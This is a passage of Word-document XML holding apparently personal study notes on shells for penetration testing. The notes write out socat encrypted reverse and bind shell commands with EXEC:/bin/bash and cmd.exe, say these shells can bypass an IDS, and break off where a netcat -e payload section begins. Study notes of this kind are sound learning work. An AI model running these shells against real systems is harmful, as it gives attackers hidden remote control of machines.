          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – allocates </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>pseudoterminal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> on target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F6AAF0" w14:textId="21C37A61" w:rsidR="0056723A" w:rsidRPr="0084205E" w:rsidRDefault="0056723A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>stderr – makes sure any error messages get shown in the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633A9FCC" w14:textId="2B5A2EE3" w:rsidR="0056723A" w:rsidRPr="0084205E" w:rsidRDefault="0056723A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sigint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – passes any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ctrl+C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> commands through into the sub-process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC573A3" w14:textId="2AE208F5" w:rsidR="0056723A" w:rsidRPr="0084205E" w:rsidRDefault="0056723A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>setsid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – creates the process in a new session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7E5EB2" w14:textId="0739427E" w:rsidR="0056723A" w:rsidRPr="0084205E" w:rsidRDefault="0056723A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>sane – stabilizes the terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB89997" w14:textId="5CA80E1B" w:rsidR="0056723A" w:rsidRPr="0084205E" w:rsidRDefault="0056723A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>fully interactive shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3631F847" w14:textId="1EE27029" w:rsidR="0056723A" w:rsidRPr="0084205E" w:rsidRDefault="0056723A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>can increase verbosity by including -d -d flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF58C57" w14:textId="0B0433B3" w:rsidR="0056723A" w:rsidRPr="0084205E" w:rsidRDefault="0056723A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Encrypted Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B40228F" w14:textId="46E19B7D" w:rsidR="0056723A" w:rsidRPr="0084205E" w:rsidRDefault="0056723A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>both bind and reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5816F209" w14:textId="624F8DC1" w:rsidR="0056723A" w:rsidRPr="0084205E" w:rsidRDefault="0056723A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>cannot be spied on unless have decryption key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FE1AAE" w14:textId="5B906A3A" w:rsidR="0056723A" w:rsidRPr="0084205E" w:rsidRDefault="0056723A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>bypass an IDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E480A10" w14:textId="3A8D7EC4" w:rsidR="0056723A" w:rsidRPr="0084205E" w:rsidRDefault="0056723A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>replace TCP with OPENSSL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61450303" w14:textId="6987E6A7" w:rsidR="0056723A" w:rsidRPr="0084205E" w:rsidRDefault="0056723A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>first generate certificate to use encrypted shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA87B2C" w14:textId="69A44D76" w:rsidR="0056723A" w:rsidRPr="0084205E" w:rsidRDefault="0056723A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> req - -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>newkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> rsa:2048 -nodes -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>keyout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EC2CF4" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EC2CF4" w:rsidRPr="0084205E">
        <w:t>shell.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EC2CF4" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -x509 -days 362 -out shell.crt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3C9F27" w14:textId="7CBF4506" w:rsidR="00EC2CF4" w:rsidRPr="0084205E" w:rsidRDefault="00EC2CF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">creates a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>2048 bit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> RSA key with matching cert file, valid for a year</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C7E553" w14:textId="0EA3A35B" w:rsidR="00EC2CF4" w:rsidRPr="0084205E" w:rsidRDefault="00EC2CF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>merge files into .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>pem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BE9C4C" w14:textId="1E405D96" w:rsidR="00EC2CF4" w:rsidRPr="0084205E" w:rsidRDefault="00EC2CF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>shell.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> shell.crt &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>shell.pem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26530D73" w14:textId="1DCF3758" w:rsidR="00EC2CF4" w:rsidRPr="0084205E" w:rsidRDefault="00EC2CF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>setup reverse shell listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318AF141" w14:textId="4D894153" w:rsidR="00EC2CF4" w:rsidRPr="0084205E" w:rsidRDefault="00EC2CF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> OPENSSL-LISTEN:&lt;PORT</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;,cert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>shell.pem,verify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>=0 –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF0B0F6" w14:textId="4764D4C0" w:rsidR="00EC2CF4" w:rsidRPr="0084205E" w:rsidRDefault="00EC2CF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>sets up OPENSSL listener using generated certificate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02429B80" w14:textId="0A9DB8C3" w:rsidR="00EC2CF4" w:rsidRPr="0084205E" w:rsidRDefault="00EC2CF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>verify=0 tells connection to not bother checking with CA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC5D15A" w14:textId="35C4044F" w:rsidR="00EC2CF4" w:rsidRPr="0084205E" w:rsidRDefault="00EC2CF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>to connect back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE61015" w14:textId="633B73A6" w:rsidR="00EC2CF4" w:rsidRPr="0084205E" w:rsidRDefault="00EC2CF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> OPENSSL:&lt;LOCAL IP&gt;:&lt;LOCAL PORT</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;,verify</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>=0 EXEC:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD09213" w14:textId="36753667" w:rsidR="00EC2CF4" w:rsidRPr="0084205E" w:rsidRDefault="00EC2CF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>bind shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B4D9EB" w14:textId="2D8EFC16" w:rsidR="00EC2CF4" w:rsidRPr="0084205E" w:rsidRDefault="00EC2CF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">target – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> OPENSSL-LISTEN:&lt;PORT</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;,cert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>shell.pem,verify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">=0 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>EXEC:cmd.exe,pipes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61699236" w14:textId="49B990E9" w:rsidR="00EC2CF4" w:rsidRPr="0084205E" w:rsidRDefault="00EC2CF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">attacker – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> OPENSSL:&lt;TARGET IP&gt;:&lt;TARGET PORT</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;,verify</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF90A71" w14:textId="17FDCEE0" w:rsidR="00A76FE4" w:rsidRPr="0084205E" w:rsidRDefault="00A76FE4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF62CC1" w14:textId="1847AA42" w:rsidR="00A76FE4" w:rsidRPr="0084205E" w:rsidRDefault="00A76FE4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> OPENSSL-LISTEN:&lt;port</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;,cert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="0097464B" w:rsidRPr="0084205E">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0097464B" w:rsidRPr="0084205E">
        <w:t>pem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0097464B" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> file&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">,verify=0 </w:t>
      </w:r>
      <w:r w:rsidR="0097464B" w:rsidRPr="0084205E">
        <w:t>&lt;second point type&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t>:`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>`,</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>raw,echo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>=0</w:t>
      </w:r>
      <w:r w:rsidR="0097464B" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> - listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EF03D2" w14:textId="63CDF5A1" w:rsidR="00A76FE4" w:rsidRPr="0084205E" w:rsidRDefault="00A76FE4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> OPENSSL:</w:t>
      </w:r>
      <w:r w:rsidR="0097464B" w:rsidRPr="0084205E">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0097464B" w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0097464B" w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="0097464B" w:rsidRPr="0084205E">
        <w:t>&lt;port&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>EXEC:"bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -li</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>",</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>,stderr,sigint,setsid,sane</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0097464B" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFEF7BE" w14:textId="05608B4A" w:rsidR="0097464B" w:rsidRPr="0084205E" w:rsidRDefault="0097464B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Common Shell Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CC5306" w14:textId="64429478" w:rsidR="0097464B" w:rsidRPr="0084205E" w:rsidRDefault="0097464B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>netcat has -e flag that allows execution of a process upon connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6946B0BC" w14:textId="4A496BD4" w:rsidR="0097464B" w:rsidRPr="0084205E" w:rsidRDefault="0097464B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>only in certain versions, these being seen as insecure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F1A2BD" w14:textId="3CB5C31E" w:rsidR="0097464B" w:rsidRPr="0084205E" w:rsidRDefault="0097464B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nc</w:t>
